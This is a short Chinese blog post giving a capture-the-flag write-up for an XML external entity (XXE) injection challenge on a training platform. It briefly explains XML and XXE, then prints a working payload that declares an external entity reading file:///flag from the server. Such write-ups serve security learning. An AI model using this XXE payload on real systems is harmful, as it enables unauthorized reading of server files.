XML外部实体注入 安鸾 Writeup


XML外部实体注入01

XML外部实体注入,简称XXE
网站URL:http://www.whalwl.host:8016/
提示:flag文件在服务器根目录下,文件名为flag


  • XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。

  • 什么是XXE
    XXE(XML External Entity Injection) 全称为 XML 外部实体注入

扩展阅读:
XML外部实体注入从入门到入土
XML实体注入
XML外部实体注入


  • 话不多说直接上poc
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///flag">  ]>
<user><username>&xxe;</username><password>admin</password></user>

image

posted @ 2021-08-14 18:58  jzking121  阅读(332)  评论(0编辑  收藏  举报